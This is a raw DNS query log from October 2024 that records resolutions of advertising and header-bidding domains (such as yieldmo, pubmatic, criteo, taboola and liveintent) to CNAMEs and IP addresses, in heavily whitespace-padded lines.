                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.cph.liveintent.com3.233.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604278088 CEST1.1.1.1192.168.2.40x10fcNo error (0)idx.cph.liveintent.com54.158.208.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604285955 CEST1.1.1.1192.168.2.40x8fc9No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604285955 CEST1.1.1.1192.168.2.40x8fc9No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.604285955 CEST1.1.1.1192.168.2.40x8fc9No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440773010 CEST1.1.1.1192.168.2.40xd157No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440773010 CEST1.1.1.1192.168.2.40xd157No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440773010 CEST1.1.1.1192.168.2.40xd157No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.33.18.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.254.71.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.249.224.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.210.114.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.128.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.440963984 CEST1.1.1.1192.168.2.40x9202No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.72.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.443538904 CEST1.1.1.1192.168.2.40x2d7cNo error (0)hbopenbid.pubmatic.comhbprebid-v3.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.443538904 CEST1.1.1.1192.168.2.40x2d7cNo error (0)hbprebid-v3.pubmnet.comhbopenbid-ams.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.443538904 CEST1.1.1.1192.168.2.40x2d7cNo error (0)hbopenbid-ams.pubmnet.com185.64.189.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.444175005 CEST1.1.1.1192.168.2.40x21d2No error (0)hbopenbid.pubmatic.comhbprebid-v3.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.444175005 CEST1.1.1.1192.168.2.40x21d2No error (0)hbprebid-v3.pubmnet.comhbopenbid-ams.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.448334932 CEST1.1.1.1192.168.2.40x8d65No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.449306965 CEST1.1.1.1192.168.2.40xd766No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.456860065 CEST1.1.1.1192.168.2.40x77f4No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.456860065 CEST1.1.1.1192.168.2.40x77f4No error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.456860065 CEST1.1.1.1192.168.2.40x77f4No error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.456860065 CEST1.1.1.1192.168.2.40x77f4No error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.459093094 CEST1.1.1.1192.168.2.40x62b1No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.461270094 CEST1.1.1.1192.168.2.40xda12No error (0)bidder.criteo.comin-ftd-65.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.461270094 CEST1.1.1.1192.168.2.40xda12No error (0)in-ftd-65.nl3.vip.prod.criteo.com178.250.1.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.461554050 CEST1.1.1.1192.168.2.40x72d2No error (0)bidder.criteo.comin-ftd-65.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.464390993 CEST1.1.1.1192.168.2.40xfaf4No error (0)rtb.openx.net35.227.252.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.464390993 CEST1.1.1.1192.168.2.40xfaf4No error (0)rtb.openx.net35.186.253.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.467997074 CEST1.1.1.1192.168.2.40xa87aNo error (0)prebid.media.net34.120.63.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.472629070 CEST1.1.1.1192.168.2.40xd07eNo error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.473664045 CEST1.1.1.1192.168.2.40xe38cNo error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.473664045 CEST1.1.1.1192.168.2.40xe38cNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.473664045 CEST1.1.1.1192.168.2.40xe38cNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.473664045 CEST1.1.1.1192.168.2.40xe38cNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.473664045 CEST1.1.1.1192.168.2.40xe38cNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.477603912 CEST1.1.1.1192.168.2.40x7607No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.477603912 CEST1.1.1.1192.168.2.40x7607No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.194.157.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.241.123.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.253.58.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.208.164.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.254.88.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.480129004 CEST1.1.1.1192.168.2.40xfc31No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.30.59.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.485311985 CEST1.1.1.1192.168.2.40x8649No error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.485311985 CEST1.1.1.1192.168.2.40x8649No error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.485435963 CEST1.1.1.1192.168.2.40xc2ceNo error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com35.169.112.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com52.202.143.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com44.222.57.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com35.169.222.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com54.88.129.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com107.20.153.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com54.163.111.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.491626978 CEST1.1.1.1192.168.2.40x96edNo error (0)livepixel-production.bln.liveintent.com18.204.89.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.492835999 CEST1.1.1.1192.168.2.40x7a42No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.472656965 CEST1.1.1.1192.168.2.40xf1fcNo error (0)prebid.media.net34.120.63.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.502284050 CEST1.1.1.1192.168.2.40xc68bNo error (0)rtb.openx.net35.227.252.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.502284050 CEST1.1.1.1192.168.2.40xc68bNo error (0)rtb.openx.net35.186.253.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com35.169.222.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com52.202.143.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com44.195.199.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com107.20.153.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com18.204.89.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com35.169.112.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com54.208.54.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.528392076 CEST1.1.1.1192.168.2.40x9b31No error (0)livepixel-production.bln.liveintent.com54.163.111.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.529146910 CEST1.1.1.1192.168.2.40x6760No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.662688017 CEST1.1.1.1192.168.2.40x4f41No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.663444996 CEST1.1.1.1192.168.2.40x5cbdNo error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.867661953 CEST1.1.1.1192.168.2.40x1408No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.867661953 CEST1.1.1.1192.168.2.40x1408No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.867661953 CEST1.1.1.1192.168.2.40x1408No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.868242025 CEST1.1.1.1192.168.2.40xdac2No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.898216963 CEST1.1.1.1192.168.2.40xb348No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.898298025 CEST1.1.1.1192.168.2.40x448cNo error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.898298025 CEST1.1.1.1192.168.2.40x448cNo error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.898298025 CEST1.1.1.1192.168.2.40x448cNo error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.898298025 CEST1.1.1.1192.168.2.40x448cNo error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.899928093 CEST1.1.1.1192.168.2.40x7febNo error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.900852919 CEST1.1.1.1192.168.2.40xf1a1No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.900852919 CEST1.1.1.1192.168.2.40xf1a1No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.900852919 CEST1.1.1.1192.168.2.40xf1a1No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.900852919 CEST1.1.1.1192.168.2.40xf1a1No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.900852919 CEST1.1.1.1192.168.2.40xf1a1No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.219397068 CEST1.1.1.1192.168.2.40xf7dfNo error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.219541073 CEST1.1.1.1192.168.2.40xd80dNo error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.219541073 CEST1.1.1.1192.168.2.40xd80dNo error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.258186102 CEST1.1.1.1192.168.2.40x2c4eNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.258186102 CEST1.1.1.1192.168.2.40x2c4eNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.258186102 CEST1.1.1.1192.168.2.40x2c4eNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.255.72.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.33.18.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.72.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.254.71.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.210.114.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.249.224.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.261262894 CEST1.1.1.1192.168.2.40xa1e3No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.208.164.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.241.123.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.30.59.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.194.157.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.254.88.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564399958 CEST1.1.1.1192.168.2.40x339fNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.253.58.104A (IP address)IN (0x0001)false
